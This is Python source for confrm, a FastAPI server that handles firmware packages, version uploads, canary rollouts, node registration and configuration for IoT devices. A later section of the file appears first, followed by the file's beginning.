@APP.put("/package/", status_code=status.HTTP_201_CREATED)
async def put_package(response: Response, package: Package = Depends()):
"""Add package description
Attributes:
package (Package): Package description to be added
"""
# Update storage record to include the local information
package_dict = package.__dict__
# Escape the strings
for key in package_dict.keys():
if isinstance(package_dict[key], str):
package_dict[key] = escape(package_dict[key])
if not package.name:
msg = "Package name cannot be empty"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-004",
"message": msg,
"detail": "While attempting to add a new package the package name was set to \"\""
}
pattern = '^[0-9a-zA-Z_-]+$'
regex = re.compile(pattern)
if regex.match(package_dict["name"]) is None:
msg = f"Package name does not match pattern {pattern}"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-010",
"message": msg,
"detail": "While attempting to add a new package the package name did not match the"
f" pattern {pattern}"
}
if not package.title:
package.title = package.name
packages = DB.table("packages")
query = Query()
existing_name = packages.get(query.name == package_dict["name"])
if existing_name is not None:
msg = "Package already exists"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-003",
"message": msg,
"detail": "While attempting to add a new package to the database a package with this " +
"name was found to already exist"
}
packages.insert(package_dict)
return {}
@APP.delete("/package/", status_code=status.HTTP_200_OK)
async def delete_package(name: str, response: Response):
"""Delete a package, its versions and all configs
Attributes:
name (str): Package to be deleted
response (Response): Starlette response object
"""
query = Query()
packages = DB.table("packages")
package_versions = DB.table("package_versions")
configs = DB.table("config")
(package_doc, status_code, err) = package_exists(name)
if package_doc is None:
response.status_code = status_code
return err
# Get all the package versions associated with this package
_versions = package_versions.search(query.name == name)
for version in _versions:
version_str = str(version["major"]) + "." + \
str(version["minor"]) + "." + \
str(version["revision"])
await delete_package_version(name, version_str, response)
# Get all the configs associated with this package
_configs = configs.search((query.type == "package") &
(query.id == name))
for config in _configs:
await delete_config(key=config["key"], type="package", response=response, id=name)
packages.remove(doc_ids=[package_doc.doc_id])
return {}
@APP.post("/package_version/", status_code=status.HTTP_201_CREATED)
async def add_package_version(
response: Response,
package_version: PackageVersion = Depends(),
set_active: bool = False,
canary_next: bool = False,
canary_id: str = "",
file: bytes = File(...)):
"""Uploads a package version with binary package
Arguments:
response (Response): Starlette response object for setting return codes
package_version (PackageVersion): Package description
set_active (bool): Default False, if true this version will be set active
file (bytes): File uploaded
"""
package_version_dict = package_version.__dict__
packages = DB.table("packages")
package_versions = DB.table("package_versions")
query = Query()
(package_doc, status_code, err) = package_exists(
package_version_dict["name"])
if package_doc is None:
response.status_code = status_code
return err
if canary_id:
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == canary_id)
if not node_doc:
msg = "Node not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-026",
"message": msg,
"detail": "While attempting to add a new package version the node " +
" given was not found"
}
existing_version = package_versions.get((query.name == package_version_dict["name"]) &
(query.major == package_version_dict["major"]) &
(query.minor == package_version_dict["minor"]) &
(query.revision == package_version_dict["revision"]))
if existing_version is not None:
msg = "Version already exists for package"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-006",
"message": msg,
"detail": "While attempting to add a new package version the version given " +
" was found to be already used"
}
if package_version_dict["major"] < 0 or \
package_version_dict["minor"] < 0 or \
package_version_dict["revision"] < 0:
msg = "Version number elements cannot be negative"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-017",
"message": msg,
"detail": "While attempting to add a new package version the version given " +
" was found to contain negative numbers"
}
# Package was uploaded, create hash of binary
_h = SHA256.new()
_h.update(file)
# Store the binary in the data_store as a base64 encoded file
filename = uuid.uuid4().hex
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
save_file = os.path.join(blob_dir, filename)
with open(save_file, "wb") as ptr:
ptr.write(base64.b64encode(file))
# Escape the strings
for key in package_version_dict.keys():
if isinstance(package_version_dict[key], str):
package_version_dict[key] = escape(package_version_dict[key])
# Update with blob details
package_version_dict["date"] = round(time.time())
package_version_dict["hash"] = _h.hexdigest()
package_version_dict["blob_id"] = filename
# Store in the database
package_versions.insert(package_version_dict)
version_str = str(package_version_dict["major"]) + "." + \
str(package_version_dict["minor"]) + "." + \
str(package_version_dict["revision"])
if set_active is True:
package_doc["current_version"] = version_str
packages.update(package_doc, query.name == package_doc["name"])
# If this is begin set to active, or a canary, delete existing canaries
if set_active is True or canary_id or canary_next is True:
try:
remove_canary(package=package_doc["name"])
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if canary_id:
set_canary(node_id=canary_id,
package=package_doc["name"],
version=version_str)
if canary_next:
set_canary(node_id="*",
package=package_doc["name"],
version=version_str)
return {}
@APP.delete("/package_version/", status_code=status.HTTP_200_OK)
async def delete_package_version(package: str, version: str, response: Response):
""" Delete a package version
Attributes:
package (str): Package with version to be deleted
version (str): Version to be deleted
response (Response): Starlette response object
"""
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
package_versions = DB.table("package_versions")
version_entry = get_package_version_by_version_string(package, version)
if version_entry is None:
msg = "Package version not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-020",
"message": msg,
"detail": "While attempting to delete a package version the version specified" +
" was not found"
}
package_versions.remove(doc_ids=[version_entry.doc_id])
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
file_path = os.path.join(blob_dir, version_entry["blob_id"])
os.remove(file_path)
# Check for any hanging canary entries
try:
remove_canary(package=package)
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if "current_version" in package_doc.keys() and package_doc["current_version"] == version:
msg = "Active version is not set"
logging.info(msg)
response.status_code = status.HTTP_200_OK
return {
"warning": "confrm-021",
"message": msg,
"detail": "While deleting a package version the version specified was set as the"
" current active version. The package version was deleted and the active version "
f" for package {package} is now not set"
}
return {}
@APP.get("/package/", status_code=status.HTTP_200_OK)
async def get_package(name: str, response: Response, lite: bool = False):
""" Returns the package information, including URL for download """
(package_doc, status_code, err) = package_exists(name)
if package_doc is None:
response.status_code = status_code
return err
return format_package_info(package_doc, lite)
@APP.get("/check_for_update/", status_code=status.HTTP_200_OK)
async def check_for_update(package: str, node_id: str, response: Response):
"""Called by node wanting to know if an update is available
Will return the most recent package version for the given package name.
Will check to see if a canary entry has been made for the node, if it is then
the be canary settings will be returned.
Arguments:
package (str): Package to check for update for
node_id (str): Id of the node making the request, or empty
response (Response): Starlette response object for setting return codes
Returns:
HTTP_200_OK / {"current_version": ..., "blob": ...} if found
HTTP_404_NOT_FOUND / Message header / {} if not found
"""
packages = DB.table("packages")
nodes = DB.table("nodes")
query = Query()
# Precedence is, node force, package canary then package version
node_doc = nodes.get(query.node_id == node_id)
if node_doc and "force" in node_doc.keys():
version_doc = get_package_version_by_version_string(
node_doc["force"]["package"],
node_doc["force"]["version"]
)
if version_doc is None:
# TODO Create test
logging.error("Force version not set, removing force entry...")
nodes.update(delete("force"), query.node_id == node_id)
else:
return {
"current_version": node_doc["force"]["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": True
}
package_canary = get_canary(package=package)
if package_canary is not None and package_canary["node_id"] == "*":
set_canary(node_id=node_id, package=package,
version=package_canary["version"])
# Check to see if there is a canary entry for this node
canary = get_canary(node_id=node_id)
if canary is not None:
version_doc = get_package_version_by_version_string(
canary["package"],
canary["version"]
)
if version_doc is None:
# TODO: Create test
logging.error("Canary version not set, removing canary entry...")
remove_canary(node_id=node_id)
else:
return {
"current_version": canary["version"],
"blob": version_doc["blob_id"],
"hash": version_doc["hash"],
"force": canary["force"]
}
package_doc = packages.get(query.name == package)
if package_doc is None:
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-000",
"message": "Package not found",
"detail": "Package not found"
}
if "current_version" in package_doc.keys():
version_entry = get_package_version_by_version_string(
package,
package_doc["current_version"])
return {
"current_version": package_doc["current_version"],
"blob": version_entry["blob_id"],
"hash": version_entry["hash"],
"force": False
}
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-011",
"message": "No versions found for package",
"detail": "While checking for updates the package was found in the database, " +
"however there are no available versions of that package"
}
@APP.put("/set_active_version/")
async def set_active_version(package: str, version: str):
""" Set the active version via the API """
# TODO: Set error codes
query = Query()
packages = DB.table("packages")
package_entry = packages.get(query.name == package)
if package_entry is None:
return {"ok": False, "info": "Package does not exist"}
version_doc = get_package_version_by_version_string(package, version)
if len(version_doc) < 1:
return {"ok": False, "info": "Specified version does not exist for package"}
package_entry["current_version"] = version
result = packages.update(package_entry, query.name == package)
try:
remove_canary(package=package)
except ValueError as err:
if str(err) != "Canary Not Found":
raise
if len(result) > 0:
return {"ok": True}
return {"ok": False}
@APP.put("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, package: str, response: Response, version: str = ""):
"""Force a node to use a particular package"""
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
if not version:
if not package_doc["current_version"]:
msg = "Package has no active version"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-008",
"message": msg,
"detail": "While attempting to set a node to use a particular package the package" +
" was found to have no active versions and no specific version was given"
}
version = package_doc["current_version"]
else:
version_doc = get_package_version_by_version_string(package, version)
if version_doc is None:
msg = "Package version not found"
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-002",
"message": msg,
"detail": "While attempting to set a node to use a particular package the " +
" version given was not found"
}
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
node_doc["force"] = {
"package": package,
"version": version
}
nodes = DB.table("nodes")
query = Query()
nodes.update(node_doc, query.node_id == node_id)
return {}
@APP.delete("/node_package/", status_code=status.HTTP_200_OK)
async def node_package(node_id: str, response: Response):
"""Delete entry forcing a node to use a particular package"""
(node_doc, status_code, err) = node_exists(node_id)
if node_doc is None:
response.status_code = status_code
return err
if "force" not in node_doc.keys():
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-007",
"message": "Node does not have a force package entry",
"detail": "While attempting to remove a package forcing entry for node" +
f" {node_id} no node forcing entry was found"
}
nodes = DB.table("nodes")
query = Query()
nodes.update(delete("force"), query.node_id == node_id)
return {}
@APP.get("/blob/", status_code=status.HTTP_200_OK)
async def get_blob(package: str, blob: str, response: Response):
""" Set a blob file """
query = Query()
package_versions = DB.table("package_versions")
(package_doc, status_code, err) = package_exists(package)
if package_doc is None:
response.status_code = status_code
return err
version_entry = package_versions.get(
query.name == package and
query.blob_id == blob)
if version_entry is None:
return {"ok": False, "info": "Specified blob does not exist for package"}
# Read the file from the data store
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
with open(os.path.join(blob_dir, blob), "rb") as ptr:
data = base64.b64decode(ptr.read())
# Create sha256 of data from store
_h = SHA256.new()
_h.update(data)
# Check hash against original
if version_entry["hash"] != _h.hexdigest():
print("Hashes do not match...")
return
return ConfrmFileResponse(data)
@APP.put("/config/", status_code=status.HTTP_201_CREATED)
async def put_config(type: str, key: str, value: str, response: Response, id: str = ""):
"""Adds new config to the config database
Attributes:
type (str): One of global, package or node
id (str): Empty, package name or node_id
key (str): Key to be stored
value (str): Value to be stored
"""
query = Query()
config = DB.table("config")
types = ["global", "package", "node"]
if not type or type not in types:
msg = "Type cannot be empty and must be a valid type"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-015",
"message": msg,
"detail": "While attempting to add a new config the type of config given was empty"
" or was incorrect."
}
pattern = '^[0-9a-zA-Z_-]+$'
regex = re.compile(pattern)
if regex.match(key) is None:
msg = f"Key name does not match pattern {pattern}"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-016",
"message": msg,
"detail": "While attempting to add a new config the key given did not match the"
f" pattern {pattern}"
}
if type == "global":
key_doc = config.get((query.key == key) & (query.type == "global"))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "package":
(package_doc, status_code, err) = package_exists(id)
if package_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "package") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
elif type == "node":
(node_doc, status_code, err) = node_exists(id)
if node_doc is None:
response.status_code = status_code
return err
key_doc = config.get((query.key == key) &
(query.type == "node") &
(query.id == id))
if key_doc is not None:
config.update({"value": value}, doc_ids=[key_doc.doc_id])
# TODO: Warning for updating, including from and to values
else:
config_doc = {
"type": type,
"id": id,
"key": key,
"value": value
}
config.insert(config_doc)
return {}
@APP.get("/config/", status_code=status.HTTP_200_OK)
async def get_config(response: Response, key: str = "", package: str = "", node_id: str = ""):
"""Get configuration value from database
Attributes:
key (str): Key to retrieve
response (Response): Starlette response object
package (str): Package of requesting node
node_id (str): node_id of requesting node
"""
query = Query()
config = DB.table("config")
if node_id:
(doc, status_code, err) = node_exists(node_id)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "node") &
(query.id == node_id) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if package:
(doc, status_code, err) = package_exists(package)
if doc is None:
response.status_code = status_code
return err
doc = config.get((query.type == "package") &
(query.id == package) &
(query.key == key))
if doc is not None:
return {"value": doc["value"]}
if not key:
# Do deepcopy to save changing database by accident
configs = deepcopy(config.all())
packages = DB.table("packages")
nodes = DB.table("nodes")
for config in configs:
if config["type"] == "package":
package_doc = packages.get(query.name == config["id"])
if package_doc is not None:
config["package_title"] = package_doc["title"]
elif config["type"] == "node":
node_doc = nodes.get(query.node_id == config["id"])
if node_doc is not None:
config["node_title"] = node_doc["title"]
return sort_configs(configs)
# Must be global...
doc = config.get((query.type == "global") &
(query.key == key))
if doc is None:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-012",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{package}\""
" / node \"{node_id}\""
}
return {"value": doc["value"]}
@APP.delete("/config/", status_code=status.HTTP_200_OK)
async def delete_config(key: str, type: str, response: Response, id: str = ""):
"""Delete a config from the database
Attributes:
key (str): key to be deleted
type (str): global/package/node
id (str): package or node id as per type
response (Response): Starlette response object
"""
query = Query()
config = DB.table("config")
if type == "global":
global_doc = config.get((query.key == key) &
(query.type == "global"))
if global_doc is not None:
config.remove(doc_ids=[global_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found, unable to delete it"
}
elif type == "package":
package_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "package"))
if package_doc is not None:
config.remove(doc_ids=[package_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for package \"{id}\","
" unable to delete it"
}
elif type == "node":
node_doc = config.get((query.key == key) &
(query.id == id) &
(query.type == "node"))
if node_doc is not None:
config.remove(doc_ids=[node_doc.doc_id])
else:
msg = "Key not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-024",
"message": msg,
"detail": f"Key \"{key}\" was not found for node \"{id}\","
" unable to delete it"
}
return {}
|
<filename>confrm/confrm.py
"""Main FastAPI Implementation of confrm
Copyright 2020 confrm.io
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Codes:
000 ERROR - - Package not found
001 ERROR - - Node not found
002 ERROR - - Package version not found
003 ERROR PUT /package/ Package already exists
004 ERROR PUT /package/ Package name cannot be empty
005 ERROR PUT /register_node/ Node id is invalid
006 ERROR PUT /package_version/ Version already exists for package
007 ERROR DELETE /node_package/ Node does not have a force package entry
008 ERROR PUT /node_package/ Package has no active version
009
010 ERROR PUT /package/ Package name does not match pattern
011 ERROR GET /check_for_update/ No versions found for package
012 ERROR GET /config/ Key not found
013
014
015
016 ERROR PUT /config/ Key name does not match pattern
017 ERROR POST /package_version/ Version numbers cannot be negative
018 ERROR PUT /node_package/ Package version not found
019
020 ERROR DELETE /package_version/ Package version not found
021 WARNING DELETE /package_version/ Active version not set
022 ERROR PUT /node_title/ Node does not exist
023 ERROR PUT /node_title/ Node title is too long
024 ERROR DELETE /config/ Key not found
025
026 ERROR POST /package_version/ Canary node not found
027
028
029
"""
import base64
import datetime
import logging
import os
import re
import time
import uuid
from copy import deepcopy
import toml
from Crypto.Hash import SHA256
from fastapi import FastAPI, File, Depends, Response, Request, status
from fastapi.responses import FileResponse
from fastapi.staticfiles import StaticFiles
from tinydb import TinyDB, Query
from tinydb.operations import delete
from markupsafe import escape
from pydantic import BaseModel # pylint: disable=E0611
from confrm.responses import ConfrmFileResponse
from confrm.zeroconf import ConfrmZeroconf
logger = logging.getLogger('confrm')
logger.setLevel(logging.INFO)
# pydantic data models are used to describe the inputs for the various REST
# API calls, if the calls do not match these names and data-types then the call
# to FastAPI will fail
class Package(BaseModel): # pylint: disable=R0903
"""Definition of a package"""
name: str
title: str
description: str
platform: str
class PackageVersion(BaseModel): # pylint: disable=R0903
"""Definition of a package version"""
name: str
major: int
minor: int
revision: int
APP = FastAPI()
CONFIG = None
DB = None
ZEROCONF = ConfrmZeroconf()
def do_config():
"""Gets the config based on an environment variable and sets up global
objects as required """
global CONFIG, DB # pylint: disable=W0603
if "CONFRM_CONFIG" not in os.environ.keys():
msg = "CONFRM_CONFIG not set in os.environ"
logging.error(msg)
raise ValueError(msg)
config_file = os.environ["CONFRM_CONFIG"]
if os.path.isfile(config_file) is False:
msg = f"Config file {config_file} does not exist"
logging.error(msg)
raise ValueError(msg)
CONFIG = toml.load(config_file)
# Create the database from the data store
DB = TinyDB(os.path.join(CONFIG["storage"]["data_dir"], "confrm_db.json"))
# Check a blob folder exists
blob_dir = os.path.join(CONFIG["storage"]["data_dir"], "blob")
if not os.path.isdir(blob_dir):
os.mkdir(blob_dir)
def get_package_versions(name: str, package: {} = None):
"""Handles the version ordering logic
Versions are sorted to be in descending order, with the currently
active version at the top of the list (position 0)
Attributes:
name (str): package name string
package ({}): [Optional] package dict, saves looking up the entry again
"""
query = Query()
if package is None:
package = DB.table("packages").search(query.name == name)
package_versions = DB.table("package_versions")
versions_raw = package_versions.search(query.name == name)
versions = []
current_version = None
for entry in versions_raw:
date_str = ""
if entry["date"] <= 0:
date_str = "Unknown"
else:
date_str = datetime.datetime.fromtimestamp(entry["date"])
version_str = f'{entry["major"]}.{entry["minor"]}.{entry["revision"]}'
if "current_version" in package.keys() and \
version_str == package["current_version"]:
current_version = {
"number": version_str,
"date": date_str,
"blob": entry["blob_id"]
}
else:
versions.append({
"number": version_str,
"date": date_str,
"blob": entry["blob_id"]
})
versions = sorted(
versions,
key=lambda x: [int(i) if i.isdigit()
else i for i in x["number"].split('.')],
reverse=True
)
if current_version is not None:
versions.insert(0, current_version)
return versions
def format_package_info(package: dict, lite: bool = False):
"""Formats data in to correct dict form
Can generate long form (for UI) or short form / lite (for nodes)
Attributes:
package (dict): package dict from DB
lite (bool): if true a reduced response is generated
"""
current_version = ""
if "current_version" in package.keys():
current_version = package["current_version"]
# Minimal data for lite implementation
if lite:
return {
"current_version": current_version,
}
versions = get_package_versions(package["name"], package)
latest_version = current_version
if len(versions) > 0:
latest_version = max(versions, key=lambda x: x["date"])["number"]
return {
"name": package["name"],
"title": package["title"],
"description": package["description"],
"platform": package["platform"],
"current_version": current_version,
"latest_version": latest_version,
"versions": versions
}
def get_package_version_by_version_string(package_name: str, version: str):
"""Get package version using string name and string version number"""
package_versions = DB.table("package_versions")
query = Query()
parts = version.split(".")
return package_versions.get(
(query.name == package_name) &
(query.major == int(parts[0])) &
(query.minor == int(parts[1])) &
(query.revision == int(parts[2])))
def sort_configs(configs): # pylint: disable=R0912
"""Sort configs by global/package/node, then by package name, then by node name
Attributes:
configs (list): List of config dicts
"""
result = []
# Find all unique keys and sort alphabetically
_keys = []
for config in configs:
if config["key"] not in _keys:
_keys.append(config["key"])
_keys = sorted(_keys, key=str.lower)
# For each key find globals, then packages, then nodes
for key in _keys:
_packages = []
_nodes = []
for config in configs:
if config["key"] == key:
if config["type"] == "global":
result.append(config)
elif config["type"] == "package":
_packages.append(config)
elif config["type"] == "node":
_nodes.append(config)
# Sort the package end node elements alphabetically
_package_ids = sorted([_package["id"]
for _package in _packages], key=str.lower)
for package in _package_ids:
for config in configs:
if config["key"] == key and config["type"] == "package" and config["id"] == package:
result.append(config)
break
_node_ids = sorted([_node["id"] for _node in _nodes], key=str.lower)
for node in _node_ids:
for config in configs:
if config["key"] == key and config["type"] == "node" and config["id"] == node:
result.append(config)
break
return result
def set_canary(node_id: str, package: str, version: str):
"""Creates an entry in the canary table for this node.
If the node already exists then the previous entry will be deleted, and if an entry
for the package already exists then that will be deleted.
There can only be one entry per package and per node.
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
version (str): Version of package the node will be set to
"""
query = Query()
canaries = DB.table("canary")
# Check for existing node entry and delete if it exists
canary_list = canaries.search(query.node_id == node_id)
for canary in canary_list:
canaries.remote(doc_ids=[canary.doc_id])
# Check for existing entries for the given package, delete if exists
packages_list = canaries.search(query.package == package)
for package_doc in packages_list:
canaries.remove(doc_ids=[package_doc.doc_id])
# Insert new entry, force is set to True, once the node has been updated
canaries.insert({
"package": package,
"version": version,
"node_id": node_id,
"force": True
})
def remove_canary(package: str = "", node_id: str = ""):
"""Removes the given package or node canary entry
Exceptions:
ValueError("Canary Not Found")
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
"""
if not package and not node_id:
raise ValueError("Canary Not Found")
query = Query()
canaries = DB.table("canary")
remove_count = 0
if package:
package_canaries = canaries.search(query.package == package)
remove_count += len(package_canaries)
for package_doc in package_canaries:
canaries.remove(doc_ids=[package_doc.doc_id])
if node_id:
node_canaries = canaries.search(query.node_id == node_id)
remove_count += len(node_canaries)
for node_doc in node_canaries:
canaries.remove(doc_ids=[node_doc.doc_id])
if remove_count == 0:
raise ValueError("Canary Not Found")
def get_canary(package: str = "", node_id: str = ""):
"""Checks if a canary exists for given package or node_id
Exceptions:
ValueError("Input Not Set")
Attributes:
node_id (str): Node_id to be added
package (str): Package name which the node will be set to
Returns:
None: No entry found
TinyDB Document: Found entry
"""
if not package and not node_id:
raise ValueError("Input Not Set")
query = Query()
canaries = DB.table("canary")
if package:
package_doc = canaries.get(query.package == package)
if package_doc is not None:
return package_doc
if node_id:
node_doc = canaries.get(query.node_id == node_id)
if node_doc is not None:
return node_doc
return None
def package_exists(package: str):
""" Checks if package exists, returns tuple of (package_doc, status, error_dict)
Attributes:
packages (str): Package to search for
"""
query = Query()
packages = DB.table("packages")
package_doc = packages.get(query.name == package)
if package_doc is None:
msg = "Package not found"
return (None, status.HTTP_404_NOT_FOUND, {
"error": "confrm-000",
"message": msg,
"detail": "The package specified was not found"
})
return (package_doc, None, None)
def node_exists(node_id: str):
""" Checks if node exists, returns tuple of (node_doc, status, error_dict)
Attributes:
packages (str): Package to search for
"""
query = Query()
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
msg = "Node not found"
return (None, status.HTTP_404_NOT_FOUND, {
"error": "confrm-001",
"message": msg,
"detail": "The node specified was not found"
})
return (node_doc, None, None)
# Files server in /static will point to ./dashboard (with respect to the running
# script)
APP.mount("/static",
StaticFiles(directory=os.path.join(os.path.dirname(__file__), "dashboard")
),
name="home")
@APP.on_event("startup")
async def startup_event():
"""Is called on application startup"""
do_config()
@APP.on_event("shutdown")
async def shutdown_event():
"""Is called on application shutdown"""
ZEROCONF.close()
@APP.get("/")
async def index():
"""Returns index page for UI"""
return FileResponse(
os.path.join(os.path.dirname(__file__), "dashboard/index.html")
)
@APP.get("/info/")
async def info():
"""Get basic info for UI elements"""
ret = {}
packages = DB.table("packages")
ret["packages"] = len(packages)
nodes = DB.table("nodes")
ret["nodes"] = len(nodes)
return ret
@APP.get("/time/")
async def get_time():
"""Returns time of day from server as unix epoch time"""
if CONFIG is None:
do_config()
return {"time": round(time.time())}
@APP.get("/canary/", status_code=status.HTTP_200_OK)
async def get_canary_api(response: Response, node_id: str = ""):
"""Helper to read back the canary status for a node
Attributes:
node_id (str): The node id to check against
response (Response): Starlette response object for setting return codes
"""
canary = get_canary(node_id=node_id)
if canary is None:
msg = "Canary entry not found"
logging.info(msg)
response.status_code = status.HTTP_404_NOT_FOUND
return {
"error": "confrm-022",
"message": msg,
"detail": msg
}
return canary
@APP.put("/register_node/", status_code=status.HTTP_200_OK)
async def register_node( # pylint: disable=R0913
node_id: str,
package: str,
version: str,
description: str,
platform: str,
request: Request,
response: Response):
"""Registers a node to the server
Attributes:
node_id (str): The node id, must be unique, MAC addresses work well
package (str): Package installed on the node
version (str): Version string of currently running package
description (str): Description of package
platform: (str): Platform type (i.e. esp32)
request (Request): Starlette request object for getting client information
response (Response): Starlette response object for setting return codes
Returns:
HTTP_200_OK
HTTP_404_NOT_FOUND
"""
query = Query()
nodes = DB.table("nodes")
# Make sure input is sane
node_id = escape(node_id)
package = escape(package)
version = escape(version)
description = escape(description)
platform = escape(platform)
# Asterisk is not allowed!
if node_id == "*":
msg = "Node id is invalid"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-005",
"message": msg,
"detail": "A node attempted to register with an invalid node_id"
}
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
entry = {
"node_id": node_id,
"title": node_id,
"package": package,
"version": version,
"description": description,
"platform": platform,
"last_updated": -1,
"last_seen": round(time.time()),
"ip_address": request.client.host
}
nodes.insert(entry)
return {}
# Update the package entry based on package name change, new version of a package
# and register this as the last update time
if node_doc["package"] != package: # Package changed
node_doc["package"] = package
node_doc["version"] = version
node_doc["last_updated"] = -1
elif node_doc["version"] != version: # Version of package changed
node_doc["version"] = version
node_doc["last_updated"] = round(time.time())
node_doc["last_seen"] = round(time.time())
node_doc["package"] = package
node_doc["description"] = description
node_doc["platform"] = platform
node_doc["ip_address"] = request.client.host
nodes.update(node_doc, query.node_id == node_id)
# Check if force package change
if "force" in node_doc.keys() and node_doc["package"] == node_doc["force"]["package"]:
nodes.update(delete("force"), query.node_id == node_id)
# Check to see if a canary
canary = get_canary(node_id=node_id)
if canary is not None:
canaries = DB.table("canary")
canary["force"] = False
canaries.update(canary, query.node_id == node_id)
return {}
@APP.get("/nodes/", status_code=status.HTTP_200_OK)
async def get_nodes(package: str = "", node_id: str = ""):
"""Returns a list of nodes, if package is set the only return nodes using that package, if
a node is set then return the doc for that node.
Attributes:
package (str): name of package to return node list for
"""
query = Query()
nodes = DB.table("nodes")
node_list = []
if package and node_id:
node_list = nodes.search((query.package == package) &
(query.node_id == node_id))
elif package:
node_list = nodes.search(query.package == package)
elif node_id:
node_list = nodes.search(query.node_id == node_id)
else:
node_list = nodes.all()
if len(node_list) == 0:
return {}
# Make a new copy of list so we can make changes to elements for display layer without
# changing the values in the database
new_node_list = deepcopy(node_list)
node_list = new_node_list
for node in node_list:
if node["last_updated"] != -1:
value = datetime.datetime.fromtimestamp(node["last_updated"])
node["last_updated"] = f"{value:%Y-%m-%d %H:%M:%S}"
else:
node["last_updated"] = "Unknown"
if node["last_seen"] != -1:
value = datetime.datetime.fromtimestamp(node["last_seen"])
node["last_seen"] = f"{value:%Y-%m-%d %H:%M:%S}"
else:
node["last_seen"] = "Unknown"
if not package and node_id:
return node_list[0]
return node_list
@APP.put("/node_title/", status_code=status.HTTP_200_OK)
async def put_node_title(response: Response, node_id: str = "", title: str = ""):
"""Sets the title of a node
Attributes:
package (str): name of package to return node list for
"""
query = Query()
nodes = DB.table("nodes")
node_doc = nodes.get(query.node_id == node_id)
if node_doc is None:
msg = "Node does not exist"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-022",
"message": msg,
"detail": "While attempting to set the title of a node, the node id given was not"
" found"
}
title = escape(title)
if len(title) > 80:
msg = "Node title is too long"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-023",
"message": msg,
"detail": "While attempting to set the title of a node, the title was too long"
}
nodes.update({"title": title}, query.node_id == node_id)
return {}
@APP.get("/packages/")
async def package_list():
"""Get package list and process for displaying on the UI """
if CONFIG is None:
do_config()
packages = DB.table("packages")
# Packages contains a RAW list of packages, should process them down for
# the UI - unique 'name' fields, with multiple 'versions'
ui_packages = {}
for package in packages:
ui_packages[package["name"]] = format_package_info(package)
return ui_packages
@APP.put("/package/", status_code=status.HTTP_201_CREATED)
async def put_package(response: Response, package: Package = Depends()):
"""Add package description
Attributes:
package (Package): Package description to be added
"""
# Update storage record to include the local information
package_dict = package.__dict__
# Escape the strings
for key in package_dict.keys():
if isinstance(package_dict[key], str):
package_dict[key] = escape(package_dict[key])
if not package.name:
msg = "Package name cannot be empty"
logging.info(msg)
response.status_code = status.HTTP_400_BAD_REQUEST
return {
"error": "confrm-004",
"message": msg,
"detail": "While attempting to add a new package the package name was set to \"\""
}
